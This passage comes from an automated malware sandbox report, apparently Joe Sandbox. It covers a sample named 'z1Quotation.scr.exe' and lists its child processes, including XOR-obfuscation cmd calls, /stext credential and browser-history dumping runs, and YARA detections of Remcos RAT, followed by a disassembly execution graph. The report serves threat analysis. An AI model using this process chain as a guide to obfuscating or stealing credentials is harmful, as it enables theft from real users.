                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:109
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:110
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:111
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:112
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "133^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:113
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:114
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "157^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:115
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:116
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:117
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:118
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "216^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:119
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:120
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "145^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:121
                                                                                                                Start time:06:02:29
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:122
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:123
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:124
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "201^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:125
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:126
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "137^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:127
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:128
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "129^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:129
                                                                                                                Start time:06:02:30
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:130
                                                                                                                Start time:06:03:05
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\z1Quotation.scr.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:132
                                                                                                                Start time:06:08:41
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                                                                                                                Imagebase:0x530000
                                                                                                                File size:222'720 bytes
                                                                                                                MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:135
                                                                                                                Start time:06:08:48
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\drivers\mstee.sys
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:
                                                                                                                Imagebase:
                                                                                                                File size:12'288 bytes
                                                                                                                MD5 hash:244C73253E165582DDC43AF4467D23DF
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:136
                                                                                                                Start time:06:08:48
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\drivers\mskssrv.sys
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:
                                                                                                                Imagebase:
                                                                                                                File size:34'816 bytes
                                                                                                                MD5 hash:26854C1F5500455757BC00365CEF9483
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:137
                                                                                                                Start time:06:08:52
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:138
                                                                                                                Start time:06:08:52
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:139
                                                                                                                Start time:06:08:52
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:140
                                                                                                                Start time:06:09:09
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_BrowsingHistoryView, Description: Yara detected BrowsingHistoryView browser history reader tool, Source: 0000008C.00000002.36509511110.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:143
                                                                                                                Start time:06:09:20
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 2348
                                                                                                                Imagebase:0x250000
                                                                                                                File size:482'640 bytes
                                                                                                                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:144
                                                                                                                Start time:06:09:25
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:145
                                                                                                                Start time:06:09:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:146
                                                                                                                Start time:06:09:26
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:18.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:13.6%
                                                                                                                  Signature Coverage:20.8%
                                                                                                                  Total number of Nodes:1571
                                                                                                                  Total number of Limit Nodes:35
                                                                                                                  execution_graph 4321 4015c0 4340 402c3e 4321->4340 4325 401629 4327 401657 4325->4327 4328 40162e 4325->4328 4326 405d5b CharNextA 4329 4015cf 4326->4329 4332 401423 28 API calls 4327->4332 4358 401423 4328->4358 4329->4325 4329->4326 4338 401611 GetFileAttributesA 4329->4338 4352 405a1f 4329->4352 4355 4059a8 CreateDirectoryA 4329->4355 4362 405a02 CreateDirectoryA 4329->4362 4337 40164f 4332->4337 4336 401640 SetCurrentDirectoryA 4336->4337 4338->4329 4341 402c4a 4340->4341 4342 406431 21 API calls 4341->4342 4343 402c6b 4342->4343 4344 4015c7 4343->4344 4345 406698 5 API calls 4343->4345 4346 405dc9 CharNextA CharNextA 4344->4346 4345->4344 4347 405de4 4346->4347 4350 405df4 4346->4350 4349 405def CharNextA 4347->4349 4347->4350 4348 405e14 4348->4329 4349->4348 4350->4348 4351 405d5b CharNextA 4350->4351 4351->4350 4353 4067c6 5 API calls 4352->4353 4354 405a26 4353->4354 4354->4329 4356 4059f4 4355->4356 4357 4059f8 GetLastError 4355->4357 4356->4329 4357->4356 4359 4054e2 28 API calls 4358->4359 4360 401431 4359->4360 4361 40639e lstrcpynA 4360->4361 4361->4336 4363 405a12 4362->4363 4364 405a16 GetLastError 4362->4364 4363->4329 4364->4363 5244 4016c0 5245 402c3e 21 API calls 5244->5245 5246 4016c6 GetFullPathNameA 5245->5246 5247 4016dd 5246->5247 5253 4016fe 5246->5253 5250 406731 2 API calls 5247->5250 5247->5253 5248 401712 GetShortPathNameA 5249 402aca 5248->5249 5251 4016ee 5250->5251 5251->5253 5254 40639e lstrcpynA 5251->5254 5253->5248 5253->5249 5254->5253 5255 404e43 GetDlgItem GetDlgItem 5256 404e99 7 API calls 5255->5256 5268 4050c0 5255->5268 5257 404f41 DeleteObject 5256->5257 5258 404f35 SendMessageA 5256->5258 5259 404f4c 5257->5259 5258->5257 5261 404f83 5259->5261 5262 406431 21 API calls 5259->5262 5260 4051a2 5264 40524e 5260->5264 5276 4051fb SendMessageA 5260->5276 5298 4050b3 5260->5298 5263 40443e 22 API calls 5261->5263 5269 404f65 SendMessageA SendMessageA 5262->5269 5270 404f97 5263->5270 5266 405260 5264->5266 5267 405258 SendMessageA 5264->5267 5265 40512f 5265->5260 5271 405194 SendMessageA 5265->5271 5273 405289 5266->5273 5278 405272 ImageList_Destroy 5266->5278 5279 405279 5266->5279 5267->5266 5268->5260 5268->5265 5309 404d91 SendMessageA 5268->5309 5269->5259 5275 40443e 22 API calls 5270->5275 5271->5260 5272 4044a5 8 API calls 5277 40544f 5272->5277 5280 405403 5273->5280 5302 4052c4 5273->5302 5314 404e11 5273->5314 5286 404fa8 5275->5286 5281 405210 SendMessageA 5276->5281 5276->5298 5278->5279 5279->5273 5282 405282 GlobalFree 5279->5282 5284 405415 ShowWindow GetDlgItem ShowWindow 5280->5284 5280->5298 5287 405223 5281->5287 5282->5273 5283 405082 GetWindowLongA SetWindowLongA 5285 40509b 5283->5285 5284->5298 5288 4050a0 ShowWindow 5285->5288 5289 4050b8 5285->5289 5286->5283 5290 404ffa SendMessageA 5286->5290 5292 40507d 5286->5292 5295 405038 SendMessageA 5286->5295 5296 40504c SendMessageA 5286->5296 5291 405234 SendMessageA 5287->5291 5307 404473 SendMessageA 5288->5307 5308 404473 SendMessageA 5289->5308 5290->5286 5291->5264 5292->5283 5292->5285 5295->5286 5296->5286 5298->5272 5299 4053ce 5300 4053d9 InvalidateRect 5299->5300 5303 4053e5 5299->5303 5300->5303 5301 4052f2 SendMessageA 5306 405308 5301->5306 5302->5301 5302->5306 5303->5280 5323 404d4c 5303->5323 5305 40537c SendMessageA SendMessageA 5305->5306 5306->5299 5306->5305 5307->5298 5308->5268 5310 404df0 SendMessageA 5309->5310 5311 404db4 GetMessagePos ScreenToClient SendMessageA 5309->5311 5312 404de8 5310->5312 5311->5312 5313 404ded 5311->5313 5312->5265 5313->5310 5326 40639e lstrcpynA 5314->5326 5316 404e24 5327 4062fc wsprintfA 5316->5327 5318 404e2e 5319 40140b 2 API calls 5318->5319 5320 404e37 5319->5320 5328 40639e lstrcpynA 5320->5328 5322 404e3e 5322->5302 5329 404c87 5323->5329 5325 404d61 5325->5280 5326->5316 5327->5318 5328->5322 5330 404c9d 5329->5330 5331 406431 21 API calls 5330->5331 5332 404d01 5331->5332 5333 406431 21 API calls 5332->5333 5334 404d0c 5333->5334 5335 406431 21 API calls 5334->5335 5336 404d22 lstrlenA wsprintfA SetDlgItemTextA 5335->5336 5336->5325 4503 403f44 4504 403f5c 4503->4504 4505 4040bd 4503->4505 4504->4505 4508 403f68 4504->4508 4506 40410e 4505->4506 4507 4040ce GetDlgItem GetDlgItem 4505->4507 4512 404168 4506->4512 4522 401389 2 API calls 4506->4522 4511 40443e 22 API calls 4507->4511 4509 403f73 SetWindowPos 4508->4509 4510 403f86 4508->4510 4509->4510 4514 403fd1 4510->4514 4515 403f8f ShowWindow 4510->4515 4516 4040f8 SetClassLongA 4511->4516 4513 40448a SendMessageA 4512->4513 4523 4040b8 4512->4523 4545 40417a 4513->4545 4519 403ff0 4514->4519 4520 403fd9 DestroyWindow 4514->4520 4517 4040aa 4515->4517 4518 403faf GetWindowLongA 4515->4518 4521 40140b 2 API calls 4516->4521 4524 4044a5 8 API calls 4517->4524 4518->4517 4525 403fc8 ShowWindow 4518->4525 4527 403ff5 SetWindowLongA 4519->4527 4528 404006 4519->4528 4526 4043c7 4520->4526 4521->4506 4529 404140 4522->4529 4524->4523 4525->4514 4526->4523 4534 4043f8 ShowWindow 4526->4534 4527->4523 4528->4517 4532 404012 GetDlgItem 4528->4532 4529->4512 4533 404144 SendMessageA 4529->4533 4530 40140b 2 API calls 4530->4545 4531 4043c9 DestroyWindow EndDialog 4531->4526 4535 404040 4532->4535 4536 404023 SendMessageA IsWindowEnabled 4532->4536 4533->4523 4534->4523 4538 40404d 4535->4538 4539 404094 SendMessageA 4535->4539 4540 404060 4535->4540 4549 404045 4535->4549 4536->4523 4536->4535 4537 406431 21 API calls 4537->4545 4538->4539 4538->4549 4539->4517 4542 404068 4540->4542 4543 40407d 4540->4543 4541 404417 SendMessageA 4544 40407b 4541->4544 4582 40140b 4542->4582 4547 40140b 2 API calls 4543->4547 4544->4517 4545->4523 4545->4530 4545->4531 4545->4537 4548 40443e 22 API calls 4545->4548 4551 40443e 22 API calls 4545->4551 4567 404309 DestroyWindow 4545->4567 4550 404084 4547->4550 4548->4545 4549->4541 4550->4517 4550->4549 4552 4041f5 GetDlgItem 4551->4552 4553 404212 ShowWindow KiUserCallbackDispatcher 4552->4553 4554 40420a 4552->4554 4576 404460 KiUserCallbackDispatcher 4553->4576 4554->4553 4556 40423c EnableWindow 4561 404250 4556->4561 4557 404255 GetSystemMenu EnableMenuItem SendMessageA 4558 404285 SendMessageA 4557->4558 4557->4561 4558->4561 4561->4557 4577 404473 SendMessageA 4561->4577 4578 403f25 4561->4578 4581 40639e lstrcpynA 4561->4581 4563 4042b4 lstrlenA 4564 406431 21 API calls 4563->4564 4565 4042c5 SetWindowTextA 4564->4565 4566 401389 2 API calls 4565->4566 4566->4545 4567->4526 4568 404323 CreateDialogParamA 4567->4568 4568->4526 4569 404356 4568->4569 4570 40443e 22 API calls 4569->4570 4571 404361 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4570->4571 4572 401389 2 API calls 4571->4572 4573 4043a7 4572->4573 4573->4523 4574 4043af ShowWindow 4573->4574 4575 40448a SendMessageA 4574->4575 4575->4526 4576->4556 4577->4561 4579 406431 21 API calls 4578->4579 4580 403f33 SetWindowTextA 4579->4580 4580->4561 4581->4563 4583 401389 2 API calls 4582->4583 